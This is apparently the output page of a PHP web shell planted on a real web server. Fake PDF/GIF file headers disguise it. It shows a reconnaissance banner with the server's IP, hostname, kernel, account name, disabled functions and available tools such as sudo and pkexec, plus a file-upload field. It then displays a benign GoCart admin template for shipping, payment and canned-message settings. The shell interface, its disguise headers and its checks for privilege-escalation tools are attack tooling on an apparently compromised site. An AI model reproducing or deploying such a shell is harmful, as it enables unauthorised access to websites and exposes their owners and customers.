%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.162 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/www/application/views/admin/ |
Upload File : |
<?php include('header.php'); ?> <?php if(count($shipping_modules) >0): ?> <table class="gc_table" style="margin-bottom:10px" cellspacing="0" cellpadding="0"> <thead> <tr> <th class="gc_cell_left"><?php echo lang('shipping_modules');?></th> <th class="gc_cell_right"></th> </tr> </thead> <tbody> <?php foreach($shipping_modules as $module=>$enabled): ?> <tr> <td><?php echo $module; ?></td> <td class="gc_cell_right list_buttons"> <?php if($enabled): ?> <a href="<?php echo site_url($this->config->item('admin_folder').'/shipping/uninstall/'.$module);?>" onclick="return areyousure();"><?php echo lang('uninstall');?></a> <a href="<?php echo site_url($this->config->item('admin_folder').'/shipping/settings/'.$module);?>"><?php echo lang('settings');?></a> <?php else: ?> <a href="<?php echo site_url($this->config->item('admin_folder').'/shipping/install/'.$module);?>"><?php echo lang('install');?></a> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; ?> <?php if(count($payment_modules) >0): ?> <table class="gc_table" cellspacing="0" cellpadding="0" style="margin-bottom:10px"> <thead> <tr> <th class="gc_cell_left"><?php echo lang('payment_modules');?></th> <th class="gc_cell_right"></th> </tr> </thead> <tbody> <?php foreach($payment_modules as $module=>$enabled): ?> <tr> <td><?php echo $module; ?></td> <td class="gc_cell_right list_buttons"> <?php if($enabled): ?> <a href="<?php echo site_url($this->config->item('admin_folder').'/payment/uninstall/'.$module);?>" onclick="return areyousure();"><?php echo lang('uninstall');?></a> <a href="<?php echo site_url($this->config->item('admin_folder').'/payment/settings/'.$module);?>"><?php echo lang('settings');?></a> <?php else: ?> <a href="<?php echo site_url($this->config->item('admin_folder').'/payment/install/'.$module);?>"><?php echo lang('install');?></a> <?php endif; ?> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; ?> <div class="button_set"> <a href="<?php echo site_url($this->config->item('admin_folder').'/settings/canned_message_form/');?>"><?php echo lang('add_canned_message');?></a> </div> <?php if(count($canned_messages) > 0): ?> <table class="gc_table" cellspacing="0" cellpadding="0"> <thead> <tr> <th class="gc_cell_left"><?php echo lang('canned_messages');?></th> <th class="gc_cell_right"> </th> </tr> </thead> <tbody> <?php foreach($canned_messages as $message): ?> <tr class="gc_row"> <td><?php echo $message['name']; ?></td> <td class="gc_cell_right list_buttons"> <?php if($message['deletable'] == 1) : ?> <a href="<?php echo site_url($this->config->item('admin_folder').'/settings/delete_message/'.$message['id']);?>" onclick="return areyousure();"><?php echo lang('delete');?></a> <?php endif; ?> <a href="<?php echo site_url($this->config->item('admin_folder').'/settings/canned_message_form/'.$message['id']);?>"><?php echo lang('edit');?></a> </td> </tr> <?php endforeach; ?> </tbody> </table> <?php endif; ?> <script type="text/javascript"> function areyousure() { return confirm('<?php echo lang('confirm_are_you_sure');?>'); } </script> <?php include('footer.php');